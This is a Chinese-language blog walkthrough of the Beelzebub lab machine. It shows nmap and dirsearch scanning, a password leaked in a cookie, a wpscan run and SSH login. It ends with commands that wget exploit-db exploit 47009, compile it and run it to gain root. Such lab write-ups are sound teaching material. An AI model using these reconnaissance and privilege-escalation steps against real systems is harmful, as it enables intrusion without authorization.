当前位置: 首页 > news >正文

Beelzebub靶机练习

下载靶机

网络选择桥接模式,kali也为桥接

主机扫描

nmap 192.168.43.1/24

80端口

扫描目录

dirsearch -u http://192.168.43.181

找到的能访问的页面,依次访问看看都是什么

在查看index.php时,发现404 但我们扫描到是200

查看页面源代码

要我们把beelzebub进行md5加密

d18e1e22becbd915b45e0e655429d487

将加密后的拼接到网址后面,再扫描一次

发现在uploads目录的talk to valak的cookie里面发现一个password

在这个页面,任意提交一个数据,会在cookie中出现密码字段的数据

使用wpscan扫描一下看是否存在可利用漏洞

wpscan --url=http://192.168.43.181/d18e1e22becbd915b45e0e655429d487/ --ignore-main-redirect --force -e --plugins-detection aggressive

进行连接

ssh krampus@192.168.43.181

列出的文件中有历史命令文件,查看一下

有提权命令,我们也执行一下

依次执行

wget https://www.exploit-db.com/download/47009

mv 47009 ./exploit.c

gcc exploit.c -o exploit

./exploit

提权到root

http://www.dtcms.com/a/324568.html

相关文章:

  • 代码随想录算法训练营第五十九天|图论part9
  • 下一代防火墙总结
  • 【软考中级网络工程师】知识点之 PPP 协议:网络通信的基石
  • Stlink识别不到-安装驱动
  • Hutool-RedisDS:简化Redis操作的Java工具类
  • 【Python 小脚本·大用途 · 第 1 篇】
  • 在VMware中安装统信UOS桌面专业版
  • Python 的浅拷贝 vs 深拷贝(含嵌套可变对象示例与踩坑场景)
  • 基础算法(11)——栈
  • 【3D图像技术分析与实现】CityGaussianV2 工作解析
  • log4cpp、log4cplus 与 log4cxx 三大 C++ 日志框架
  • 机器学习数学基础:46.Mann-Kendall 序贯检验(Sequential MK Test)
  • Java集合框架、Collection体系的单列集合
  • 有限元方法中的数值技术:追赶法求解三对角方程
  • 【鸿蒙/OpenHarmony/NDK】什么是NDK? 为啥要用NDK?
  • PCB知识07 地层与电源层
  • LLIC:基于自适应权重大感受野图像变换编码的学习图像压缩
  • 每日一题:使用栈实现逆波兰表达式求值
  • Redis高级
  • AAAI 2025丨具身智能+多模态感知如何精准锁定目标
  • 如何解决pip安装报错ModuleNotFoundError: No module named ‘ray’问题
  • Python数据分析常规步骤整理
  • Mysql系列--5、表的基本查询(下)
  • Speaking T2 - Dining Hall to CloseDuring Spring Break
  • 机器学习 DBScan
  • 一键复制产品信息到剪贴板
  • 【接口自动化】初识pytest,一文讲解pytest的安装,识别规则以及配置文件的使用
  • 网闸技术解析:如何实现对国产数据库(达梦/金仓)的深度支持
  • AI 代理框架:使用正确的工具构建更智能的系统
  • 网络小工具发布 IPPw